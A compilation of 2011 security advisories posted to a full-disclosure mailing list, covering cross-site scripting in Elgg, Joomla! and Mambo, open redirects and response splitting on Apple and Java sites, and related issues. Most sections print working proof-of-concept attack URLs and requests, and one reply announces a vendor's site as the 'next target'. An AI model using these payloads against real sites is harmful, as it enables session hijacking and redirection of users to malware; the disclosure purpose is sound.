[Full-disclosure] Elgg <= 1.7.9 | Multiple Cross Site Scripting Vulnerabilities

2011-07-30 Thread YGN Ethical Hacker Group
Elgg <= 1.7.9 | Multiple Cross Site Scripting Vulnerabilities



1. OVERVIEW

The Elgg 1.7.9 and lower versions are vulnerable to multiple Cross
Site Scripting issues.


2. BACKGROUND

Elgg is an award-winning social networking engine, delivering the
building blocks that enable businesses, schools, universities and
associations to create their own fully-featured social networks and
applications. Well-known organizations with networks powered by Elgg
include: Australian Government, British Government, Federal Canadian
Government, MITRE, The World Bank, UNESCO, NASA, Stanford University,
Johns Hopkins University and more (http://elgg.org/powering.php)


3. VULNERABILITY DESCRIPTION

Several parameters (page_owner, content, internalname, QUERY_STRING)
are not properly sanitized, which allows an attacker to conduct Cross
Site Scripting attacks. An attacker may create a specially crafted URL
that executes arbitrary script code in a victim's browser.


4. VERSIONS AFFECTED

Elgg <= 1.7.9


5. PROOF-OF-CONCEPT/EXPLOIT


XSS (Browsers: All)

N.B. A logged-in user session is required.

vulnerable parameters: page_owner, content, internalname, QUERY_STRING
__

REQUEST:

http://localhost/elgg/mod/file/search.php?subtype=file&page_owner=%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22%20onmouseover%3d%22alert%28/XSS/%29%22%20x=%22f

http://localhost/elgg/mod/riverdashboard/?content=%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22%20onmouseover%3d%22alert%28/XSS/%29%22%20x=%22f&callback=true

http://localhost/elgg/pg/embed/upload?internalname=%22%20onmouseover%3d%22alert%28%27XSS%27%29%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22

http://localhost/elgg/pg/pages/edit/%22%20onmouseover%3d%22alert%28%27XSS%27%29%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22


XSS (exploitable in older browser versions - IE/FF)
vulnerable parameters: send_to, container_guid
=

REQUEST:

http://localhost/elgg/pg/messages/compose/?send_to=%22%20style%3d%22background-image%3aurl%28javascript:alert%28/XSS/%29%29%22%20x=%22s


Portion of RESPONSE:

<input type="hidden" name="send_to" value=""
style="background-image:url(javascript:alert(/XSS/))" x="s" />


REQUEST:

http://localhost/elgg/pg/pages/new/?container_guid=%22%20style%3d%22background-image%3aurl%28javascript:alert%28/XSS/%29%29%22%20x=%22


Portion of RESPONSE:

<input type="hidden" name="container_guid" value=""
style="background-image:url(javascript:alert(/XSS/))" x="s" />



6. SOLUTION

Upgrade to 1.7.10 or higher.


7. VENDOR

Curverider Ltd
http://www.curverider.co.uk/
http://elgg.org/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-06-09: vulnerability reported
2011-06-14: vendor released fixed version
2011-07-30: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[elgg_179]_cross_site_scripting
Project Home: http://elgg.org/
XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
CWE-79: http://cwe.mitre.org/data/definitions/79.html


#yehg [2011-07-30]


-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd



[Full-disclosure] Joomla! 1.7.0-RC and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities

2011-07-21 Thread YGN Ethical Hacker Group
/components/content-component/article-categories/26-park-site'<script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-categories/29-fruit-shop-site'<script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-category-list/20-extensions'<script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-category-list/24-joomla'<script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/'<script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/1-joomla-announcements'<script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/2-new-joomla-extensions'<script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/3-joomla-security-news'<script>alert(/XSS/)</script>




6. IMPACT

Attackers can compromise the session of a currently logged-in user or
administrator and perform arbitrary actions on that user's behalf,
including those available under /administrator/.


7. SOLUTION

Development of Joomla! 1.6.x has ceased; there will be no fixed version
for 1.6.x.
Upgrade to Joomla! 1.7.0-stable or higher.


8. VENDOR

Joomla! Developer Team
http://www.joomla.org


9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


10. DISCLOSURE TIME-LINE

2011-07-02: notified vendor
2011-07-19: patched version, 1.7.0, released
2011-07-22: vulnerability disclosed


11. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.5]_cross_site_scripting(XSS)
Previous Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.3]_cross_site_scripting(XSS)
http://yehg.net/lab/#advisories.joomla
Vendor Advisory URL:
http://developer.joomla.org/security/news/357-20110701-xss-vulnerability.html

#yehg [2011-07-22]


[Full-disclosure] Joomla! 1.7.0-RC and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities

2011-07-21 Thread YGN Ethical Hacker Group
/components/content-component/article-categories/26-park-site'<script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-categories/29-fruit-shop-site'<script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-category-list/20-extensions'<script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/content-component/article-category-list/24-joomla'<script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/'<script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/1-joomla-announcements'<script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/2-new-joomla-extensions'<script>alert(/XSS/)</script>

http://localhost/joomla164/index.php/using-joomla/extensions/components/news-feeds-component/news-feed-category/3-joomla-security-news'<script>alert(/XSS/)</script>




6. IMPACT

Attackers can compromise the session of a currently logged-in user or
administrator and perform arbitrary actions on that user's behalf,
including those available under /administrator/.


7. SOLUTION

Development of Joomla! 1.6.x has ceased; there will be no fixed version
for 1.6.x.
Upgrade to Joomla! 1.7.0-stable or higher.


8. VENDOR

Joomla! Developer Team
http://www.joomla.org


9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


10. DISCLOSURE TIME-LINE

2011-07-02: notified vendor
2011-07-19: patched version, 1.7.0-stable, released
2011-07-22: vulnerability disclosed


11. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.7.0-rc]_cross_site_scripting(XSS)
Previous Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.3]_cross_site_scripting(XSS)
http://yehg.net/lab/#advisories.joomla
Vendor Advisory URL:
http://developer.joomla.org/security/news/357-20110701-xss-vulnerability.html

#yehg [2011-07-22]


[Full-disclosure] MyST BlogSite | Multiple Vulnerabilities

2011-07-16 Thread YGN Ethical Hacker Group
===
MyST BlogSite | Multiple Vulnerabilities
===


1. VULNERABILITY DESCRIPTION


-- Issue Title: Arbitrary URL Redirect
Component: MyST BlogSite ClickDirector

Ref: OWASP - Top 10 - 2010 - A10
Ref-Link: 
https://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards

Proof-Of-Concept:
http://blogsite.com/public/click/~sites/attacker.in/malware_exists_in_this_page/
http://blog.cenzic.com/public/click/~sites/attacker.in/malware_exists_in_this_page/
[FIXED]


-- Issue Title: Information Leakage
Ref: WASC-13
Ref-Link: http://projects.webappsec.org/w/page/13246936/Information-Leakage

The leaked information could be used for brute-force attacks against the login form (http://blogsite.com/login).

Proof-Of-Concept:
http://blogsite.com/public/mostl/1
http://blogsite.com/public/mostl/2
http://blogsite.com/public/my-account/1
http://blogsite.com/public/my-account/2
http://blogsite.com/public/object/1
http://blogsite.com/public/object/2
http://blogsite.com/public/object/3


-- Issue Title: Arbitrary Text Insertion

This could be used to deliver defamatory messages to unsuspecting users.

Proof-of-Concept:
http://blogsite.com/public/mostl-action/1?action=Browse&text=This%20blog%20was%200wned!



2. VENDOR

MyST Technology Partners, Inc.
http://myst-technology.com/


3. DISCLOSURE TIME-LINE

2011-04-17: reported to vendor
2011-07-16: vulnerability found to be unfixed
2011-07-16: vulnerability disclosed


4. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[MyST_BlogSite]_vulnerabilities_2011-07

#yehg [2011-07-16]



[Full-disclosure] Vulnerabilities in developer.apple.com

2011-07-01 Thread YGN Ethical Hacker Group
Vulnerabilities via URL Redirector in developer.apple.com



1. VULNERABILITY DESCRIPTION

Arbitrary URL Redirect
==

POC (Browsers: All)
https://developer.apple.com/membercenter/urlRedirect.action?fullURL=http://attacker.in/malware_exists_in_this_page

Issue References:
OWASP Top 10 A10 -
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE 601 -  http://cwe.mitre.org/data/definitions/601.html


Cross Site Scripting (XSS) via Arbitrary URL Redirect


POC (Browsers: Safari, Opera):
https://developer.apple.com/membercenter/urlRedirect.action?fullURL=data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgiQ3Jvc3MgU2l0ZSBTY3JpcHRpbmcgRGVtbyBieVxuXG55ZWhnLm5ldFxuIik8L3NjcmlwdD4%3D

Issue References:
OWASP Top 10 A2 - https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE 79 - http://cwe.mitre.org/data/definitions/79.html


HTTP Response Splitting (HRS) via Arbitrary URL Redirect


https://developer.apple.com/membercenter/urlRedirect.action?fullURL=http://attacker.in%0D%0ALocation%3A%0D%0AContent-Type%3A%20text%2Fhtml%0D%0AContent-Length%3A%2089%0D%0A%0D%0A%3Chtml%3E%3Ctitle%3EThis%20page%20was%20hacked%3F%3C%2Ftitle%3E%3Ch1%3EThis%20page%20was%20hacked%3F%20-%20Not%20Really%3C%2Fh1%3E%3C!--

Issue References:
CWE 113 - http://cwe.mitre.org/data/definitions/113.html


Demo:
http://yehg.net/lab/pr0js/training/view/misc/Vulnerabilities%20Via%20Redirectors%20-%20developer.apple.com/
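The three PoCs above come down to one missing check: fullURL is used as received. The Python below is an added example, not Apple's urlRedirect.action code, of the validation the redirector should perform before issuing a Location header, plus a decoder for the data: URI so what the XSS PoC delivers can be read offline. The allowlist (developer.apple.com only) is an assumption made for the example; the three fullURL values are the ones from the PoCs, with the HRS one shortened.

```python
import base64
from urllib.parse import unquote, urlsplit

# Added example; not Apple's code. Validates a redirect target the way the
# vulnerable parameter should have been validated, and decodes the data: URI
# used in the XSS PoC.

# fullURL values from the PoCs above (the HRS one is shortened).
POC_REDIRECT = "http://attacker.in/malware_exists_in_this_page"
POC_DATA_URI = ("data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgiQ3Jvc3MgU2l0ZSBTY3Jp"
                "cHRpbmcgRGVtbyBieVxuXG55ZWhnLm5ldFxuIik8L3NjcmlwdD4%3D")
POC_HRS = ("http://attacker.in%0D%0ALocation%3A%0D%0AContent-Type%3A%20text%2Fhtml"
           "%0D%0AContent-Length%3A%2089%0D%0A%0D%0A%3Chtml%3E")

# Assumed allowlist: the member center should only ever bounce to itself.
ALLOWED_HOSTS = frozenset({"developer.apple.com"})


def decode_data_uri(raw_param):
    """Decode a percent-encoded base64 data: URI and return its payload text."""
    uri = unquote(raw_param)
    head, sep, payload = uri.partition(",")
    if not sep or not head.lower().startswith("data:") or ";base64" not in head.lower():
        raise ValueError("not a base64 data: URI")
    return base64.b64decode(payload).decode("utf-8", "replace")


def check_redirect_target(raw_param, allowed_hosts=ALLOWED_HOSTS):
    """Return (True, target) for an acceptable redirect, else (False, reason).

    raw_param is the fullURL value exactly as received (percent-encoded).
    """
    target = unquote(raw_param)
    # Header-injection check on the raw string: urlsplit() silently strips
    # CR, LF and TAB, so checking after parsing would miss the HRS payload.
    if any(c in target for c in "\r\n\t\x00"):
        return False, "control character in target"
    parts = urlsplit(target)
    scheme = parts.scheme.lower()
    if scheme not in ("http", "https"):
        # also rejects data:, javascript: and scheme-relative //host targets
        return False, "scheme %r not allowed" % scheme
    if parts.username is not None or parts.password is not None:
        # https://trusted.example@attacker.in/ would otherwise read as trusted
        return False, "userinfo in target"
    host = (parts.hostname or "").lower()
    if host not in allowed_hosts:
        return False, "host %r not in allowlist" % host
    return True, target


if __name__ == "__main__":
    for value in (POC_REDIRECT, POC_DATA_URI, POC_HRS,
                  "https://developer.apple.com/membercenter/index.action"):
        print(check_redirect_target(value))
    print(decode_data_uri(POC_DATA_URI))
```

Rejecting on scheme and host rather than on a blocklist of bad prefixes is what closes all three variants at once; a check that only strips "javascript:" would still pass the data: URI and the CRLF payload.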


2. VENDOR

Apple Inc
http://www.apple.com


3. VULNERABILITY STATUS

FIXED


4. DISCLOSURE TIME-LINE

2011-04-25: reported to vendor
2011-04-27: vendor replied "Thank you for forwarding this issue to us.
We take any report of a potential security issue
very seriously."
2011-06-29: vendor replied that the vulnerability was fixed
2011-07-01: vulnerability disclosed


5. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/sites/developer.apple.com/[apple-developer]_ur_xss_hrs


#yehg [2011-07-01]



[Full-disclosure] smallftpd <= 1.0.3-fix | Connection Saturation Remote Denial of Service Vulnerability

2011-06-29 Thread YGN Ethical Hacker Group
smallftpd <= 1.0.3-fix | Connection Saturation Remote Denial of
Service Vulnerability




1. OVERVIEW

The smallftpd FTP server is vulnerable to denial of service when handling
many concurrent connection requests, regardless of its maximum
connection setting. On successful exploitation, smallftpd crashes or
rejects new FTP login requests.


2. BACKGROUND

The smallftpd FTP server is a small and simple multi-threaded FTP
server for Windows.


3. VERSIONS AFFECTED

1.0.3-fix and earlier


4. PROOF-OF-CONCEPT/EXPLOIT

http://dev.metasploit.com/redmine/attachments/1330/smallftpd103fix_saturation.rb
http://www.exploit-db.com/download/17455


5. SOLUTION

The vendor has discontinued this product and therefore has no patch or
upgrade that mitigates this problem. It is recommended that an
alternate software package be used in its place.


6. VENDOR

Arnaud Mary


7. CREDIT

This vulnerability was discovered by Myo Soe, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


8. REFERENCES

Original Advisory URL:
http://core.yehg.net/lab/pr0js/advisories/smallftpd_103-fix_saturation_dos
SmallFTPD Home Page: http://smallftpd.sourceforge.net/
SmallFTPD Download Stat:
http://sourceforge.net/project/stats/?group_id=104723&ugn=smallftpd&type=&mode=alltime



[Full-disclosure] Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities

2011-06-28 Thread YGN Ethical Hacker Group
Joomla! 1.6.3 and lower | Multiple Cross Site Scripting (XSS) Vulnerabilities



1. OVERVIEW

Joomla! 1.6.3 and lower are vulnerable to multiple Cross Site Scripting issues.


2. BACKGROUND

Joomla is a free and open source content management system (CMS) for
publishing content on the World Wide Web and intranets. It comprises a
model–view–controller (MVC) Web application framework that can also be
used independently.
Joomla is written in PHP, uses object-oriented programming (OOP)
techniques and software design patterns, stores data in a MySQL
database, and includes features such as page caching, RSS feeds,
printable versions of pages, news flashes, blogs, polls, search, and
support for language internationalization.


3. VULNERABILITY DESCRIPTION

Several parameters (QueryString, option, searchword) in Joomla! core
components (com_content, com_contact, com_newsfeeds, com_search) are
not properly sanitized when submitted to the /index.php URL, which
allows an attacker to conduct Cross Site Scripting attacks. An attacker
may create a specially crafted URL that executes arbitrary script code
in a victim's browser.


4. VERSION AFFECTED

1.6.3 and lower


5. PROOF-OF-CONCEPT/EXPLOIT


component: com_contact, parameter: QueryString (Browsers: All)
===

http://attacker.in/joomla163_noseo/index.php?option=com_contact&view=category&catid=26&id=36&Itemid=-1;<script>alert(/XSS/)</script>


component: com_content, parameter: QueryString (Browsers: All)
===

http://attacker.in/joomla163_noseo/index.php?option=com_content&view=category&id=19&Itemid=260&limit=10&filter_order_Dir=&limitstart=&filter_order=<script>alert(/XSS/)</script>


component: com_newsfeeds, parameter: QueryString (Browsers: All)
=

http://attacker.in/joomla163_noseo/index.php?option=com_newsfeeds&view=category&id=17&whateverehere=;<script>alert(/XSS/)</script>&Itemid=253&limit=10&filter_order_Dir=ASC&filter_order=ordering


parameter: option (Browsers: All)


http://attacker.in/joomla163_noseo/index.php?option=;<script>alert(/XSS/)</script>&task=reset.request


component: com_search, parameter: searchword (Browsers: IE, Konqueror)
=

[REQUEST]
POST /joomla163/index.php HTTP/1.1
Referer: http://attacker.in/joomla163/
User-Agent: Konqueror/4.5
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: attacker.in
Accept-Encoding: gzip, deflate
Content-Length: 125

option=com_search&searchword='%2522%253C%252Fscript%253E%253Cscript%253Ealert(%252FXSS%252F)%253C%252Fscript%253E&task=search
[/REQUEST]

This searchword XSS was identified through source code review:
http://yehg.net/lab/pr0js/advisories/joomla/core/1.6.3/xss/XSS%20%5bMode=SEO,NON-SEO%5d/(searchword)_xss_vuln_code_portion.jpg


6. IMPACT

Attackers can compromise the session of a currently logged-in user or
administrator and perform arbitrary actions on that user's behalf,
including those available under /administrator/.


7. SOLUTION

Upgrade to Joomla! 1.6.4 or higher


8. VENDOR

Joomla! Developer Team
http://www.joomla.org


9. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


10. DISCLOSURE TIME-LINE

2011-05-26: notified vendor
2011-06-28: vendor released fix
2011-06-28: vulnerability disclosed


11. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/joomla/core/[joomla_1.6.3]_cross_site_scripting(XSS)
Vendor Advisory URL:
http://developer.joomla.org/security/news/352-20110604-xss-vulnerability.html
XSS FAQ: http://www.cgisecurity.com/xss-faq.html
OWASP Top 10: http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE-79: http://cwe.mitre.org/data/definitions/79.html


#yehg [2011-06-28]


[Full-disclosure] Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities

2011-06-27 Thread YGN Ethical Hacker Group
Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities



1. OVERVIEW

Mambo CMS 4.6.5 and lower versions are vulnerable to Cross Site Scripting.


2. BACKGROUND

Mambo is a full-featured, award-winning content management system that
can be used for everything from simple websites to complex corporate
applications. It is used all over the world to power government
portals, corporate intranets and extranets, ecommerce sites, nonprofit
outreach, schools, church, and community sites. Mambo's power in
simplicity also makes it the CMS of choice for many small businesses
and personal sites.


3. VULNERABILITY DESCRIPTION

Multiple parameters (task, menu, menutype, zorder, search, client,
section) are not properly sanitized, which allows an attacker to conduct
Cross Site Scripting attacks. An attacker may create a specially crafted
URL that executes arbitrary script code in a victim's browser.


4. VERSIONS AFFECTED

Tested on Mambo CMS 4.6.5 (current as of 2011-06-27)


5. PROOF-OF-CONCEPT/EXPLOIT

FrontEnd
==

param: task

http://attacker.in/mambo/index.php?option=com_content&task=%22%20style=width:1000px;height:1000px;top:0;left:0;position:absolute%20onmouseover=alert%28/XSS/%29%20&id=3&Itemid=32


BackEnd
==

param: menu

http://attacker.in/mambo/administrator/index2.php?option=com_menumanager&task=edit&hidemainmenu=1&menu=Move+your+mouse+here%22%20style=position:absolute;width:1000px;height:1000px;top:0;left:0;%20onmouseover=alert%28/XSS/%29%20


param: menutype [hidden form XSS, especially in IE 6/7 and older versions of Firefox]

http://attacker.in/mambo/administrator/index2.php?option=com_menus&menutype=xss%20style%3dx%3aexpression(alert(/XSS/))%20X
http://attacker.in/mambo/administrator/index2.php?option=com_menus&menutype=xss%20%20%20style=background-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;%20x=%20X


param: zorder

http://attacker.in/mambo/administrator/index2.php?limit=10&order%5b%5d=11&boxchecked=0&toggle=on&search=simple_search&task=&limitstart=0&cid%5b%5d=on&zorder=c.ordering+DESC;<script>alert(/XSS/)</script>&filter_authorid=62&hidemainmenu=0&option=com_typedcontent


param: search

http://attacker.in/mambo/administrator/index2.php?limit=10&boxchecked=0&toggle=on&search=xss;<script>alert(/XSS/)</script>&task=&limitstart=0&hidemainmenu=0&option=com_comment


param: client

http://attacker.in/mambo/administrator/index2.php?option=com_modules&client=%27%22%20onmouseover=alert%28/XSS/%29%20a=%22%27
NB: triggers on mouseover of the banner link


param: section [hidden form XSS, especially in IE 6/7 and older versions of Firefox]

http://attacker.in/mambo/administrator/index2.php?option=com_categories&section=com_weblinks%20style%3dx%3aexpression(alert(/XSS/))%20X&task=editA&hidemainmenu=1&id=2

http://attacker.in/mambo/administrator/index2.php?option=com_categories&section=com_weblinks%20style%3d-moz-binding:url(http://www.businessinfo.co.uk/labs/xbl/xbl.xml%23xss)%20X&task=editA&hidemainmenu=1&id=2

http://attacker.in/mambo/administrator/index2.php?option=com_categories&section=com_weblinks%20%20style=background-image:url('javascript:alert(0)');width:1000px;height:1000px;display:block;%20x=%20X&task=editA&hidemainmenu=1&id=2

http://attacker.in/mambo/administrator/index2.php?option=com_categories&section=com_weblinks%20%20style=background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%20x=%20X&task=editA&hidemainmenu=1&id=2
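The Elgg, Joomla! and Mambo proofs of concept above share one mechanism: a parameter is echoed into an HTML attribute (or straight into the page) without encoding, so a leading quote closes the attribute and the rest of the value becomes extra attributes, an event handler or scriptable CSS, or a <script> element. The Python below is an added example, not code from any of those projects or from the advisories. It shows the vulnerable hidden-field rendering next to the encoded one, and a small html.parser-based checker a tester can run over a captured response to see whether a probe ended up in an executable position or stayed inside a single escaped value. The send_to payload and the resulting fragment are the ones from the Elgg section; the other inputs are constructed.

```python
import html
from html.parser import HTMLParser

# Added example (not Elgg, Joomla! or Mambo code). Shows why the hidden-form
# PoCs on this page work and how to recognise the result in a response.

# Payload from the Elgg send_to PoC, URL-decoded. The leading quote closes
# value="", and the rest becomes new attributes on the <input> element.
SEND_TO_PAYLOAD = '" style="background-image:url(javascript:alert(/XSS/))" x="s'
PROBE = "/XSS/"      # canary present in every PoC payload on this page

SCRIPTABLE_CSS = ("javascript:", "expression(", "-moz-binding")


def render_hidden_vulnerable(name, value):
    """String concatenation without encoding: the bug class in the advisories."""
    return '<input type="hidden" name="%s" value="%s" />' % (name, value)


def render_hidden(name, value):
    """Fix: HTML-encode attribute values, quotes included (quote=True)."""
    return '<input type="hidden" name="%s" value="%s" />' % (
        html.escape(name, quote=True), html.escape(value, quote=True))


class InjectionFinder(HTMLParser):
    """Collect (tag, attribute-or-None, kind) for every place a probe could
    execute: event handlers, scriptable style values, javascript: URLs and
    <script> bodies. Keys on attribute *names*, so an encoded payload that
    stays inside one value is correctly reported as harmless."""

    def __init__(self, probe):
        super().__init__()
        self.probe = probe
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            value = value or ""                  # boolean attributes have None
            lname, lvalue = name.lower(), value.lower().replace(" ", "")
            if lname.startswith("on") and self.probe in value:
                self.findings.append((tag, name, "event handler"))
            elif lname == "style" and any(k in lvalue for k in SCRIPTABLE_CSS):
                self.findings.append((tag, name, "scriptable css"))
            elif lname in ("href", "src", "action") and lvalue.startswith("javascript:"):
                self.findings.append((tag, name, "javascript: url"))
        if tag.lower() == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        # html.parser hands <script> contents to handle_data verbatim
        if self._in_script and self.probe in data:
            self.findings.append(("script", None, "script body"))


def find_injections(body, probe=PROBE):
    """Parse a response body and return the executable injection points."""
    finder = InjectionFinder(probe)
    finder.feed(body)
    finder.close()
    return finder.findings


if __name__ == "__main__":
    bad = render_hidden_vulnerable("send_to", SEND_TO_PAYLOAD)
    print(bad)                        # the fragment quoted in the Elgg advisory
    print(find_injections(bad))       # [('input', 'style', 'scriptable css')]
    print(find_injections(render_hidden("send_to", SEND_TO_PAYLOAD)))   # []
```

The checker deliberately does not decide whether a given browser will run the CSS; as the advisories note, expression(), -moz-binding and javascript: inside background-image only fire in older IE and Firefox, so a "scriptable css" finding is a confirmed injection whose exploitability depends on the victim's browser.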


6. SOLUTION

The vendor appears to have discontinued development. It is recommended to
use another CMS that is in active development.


7. VENDOR

Mambo CMS Development Team
http://mambo-developer.org


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2010-11-31: notified vendor through bug tracker
2011-06-27: no patched version released up to date
2011-06-27: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[mambo4.6.x]_cross_site_scripting
Mambo CMS: http://mambo-code.org/gf/download/frsrelease/388/791/MamboV4.6.5.zip


#yehg [2011-06-27]



Re: [Full-disclosure] Mambo CMS 4.6.x (4.6.5) | Multiple Cross Site Scripting Vulnerabilities

2011-06-27 Thread YGN Ethical Hacker Group
> Did you really test a code base that is a version of an old Joomla base
No

> or did you look at the code, and test old Joomla bugs against it?
No


The XSS results are from a purely black-box scan of Mambo 4.6.5.


"Joomla (Joomla! 1.0.0) was released on September 16, 2005. It was a
re-branded release of Mambo 4.5.2.3 which, itself, was combined with
other bug and moderate-level security fixes."

From that statement, it can be assumed that the code bases of Mambo
4.5.2.4 and higher are different from those of Joomla! 1.1 and
higher. As you suggest, we could check old Joomla! 1.x bugs against Mambo
4.6.x, but it may be time-consuming to analyze the code changes and the
validity of bugs in each version of both CMSs.


https://secure.wikimedia.org/wikipedia/en/wiki/Joomla
http://www.joomla.org/announcements/general-news/154-introducing-joomla-10.html



> I thought these were found in Joomla ages ago?

No.





[Full-disclosure] java.com | Arbitrary URL Redirect Vulnerability

2011-04-23 Thread YGN Ethical Hacker Group
==
java.com | Arbitrary URL Redirect Vulnerability
==


1. VULNERABILITY DESCRIPTION

- Arbitrary URL Redirect
   http://java.com/inc/BrowserRedirect1.jsp?locale=en&host=attacker.in

Demo: 
http://yehg.net/lab/pr0js/training/view/misc/java.com_Arbitrary_URL_Redirect/


2. VENDOR

Oracle Inc
http://www.oracle.com


3. VULNERABILITY STATUS

FIXED


4. DISCLOSURE TIME-LINE

2011-04-19: reported to vendor
2011-04-23: vendor fixed the issue
2011-04-24: vulnerability disclosed


5. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/sites/java.com/[java.com]_url_redirection
OWASP-Top-10_2010-A10:
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
SANS-TOP-25: http://www.sans.org/top25-software-errors/
CWE-601: http://cwe.mitre.org/data/definitions/601.html

#yehg [2011-04-24]


-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd



Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread YGN Ethical Hacker Group
According to xssed.com,  there are two remaining XSS issues:

https://kb.mcafee.com/corporate/index?page=content&id=;; alert(1); //
https://kc.mcafee.com/corporate/index?page=content&id=;; alert(1); //


You guys know our disclosed issues are very simple and can easily be
found through viewing HTML/JS source codes and simple Google Hacking
(http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).

However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
http://www.cenzic.com/company/management/khera/,  according to Network
World News editor - Ellen Messmer.  Thus, the next target is Cenzic
web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
is.


-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar (Burma)
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd




On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes pa...@ximen.es wrote:
> FYI
>
> http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-Security-Holes
>
>
> Pablo Ximenes
> http://ximen.es/
> http://twitter.com/pabloximenes
>
>
>
>
> 2011/3/28 Pablo Ximenes pa...@ximen.es:
> > blog post about this: http://ximen.es/?p=469
> >
> > Please, don't throw stones at me.
> >
> > []'s
> >
> >
> > Pablo Ximenes
> > http://ximen.es/
> > http://twitter.com/pabloximenes
> >
> >
> >
> > 2011/3/27 YGN Ethical Hacker Group li...@yehg.net

> > > [...]

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread YGN Ethical Hacker Group
Thanks for all your inputs and discussions.

We believe keeping this information secret is unethical and irresponsible.



For those who think or say we're unethical/illegal,

there is a so-called Passive Scanning technique in security testing.

Passive scanning (a.k.a. Passive Reconnaissance) is basically examining
a web site's workflows and the source code involved in them to identify
vulnerabilities without ever attacking the target itself.

Contrary to what most people think, passive scanning allows
everyone to audit any web site without breaking the law and without
alarming the firewalls in front of it.

Basically it starts as:

1. Do Google Hacking and look for potential information leakage. (Most
of the tools allow you to add your own GH dorks.)

2. Browse the target web site with a scanner that has passive
vulnerability scanning capability - ratproxy, zaproxy, webscarab,
fiddler+watcher, burp-pro or you name it.
Also use metadata extraction tools, and look for potential
information leakage & others.

3. Examine all contents of JavaScript & decompiled Flash/Silverlight/Java Applets.

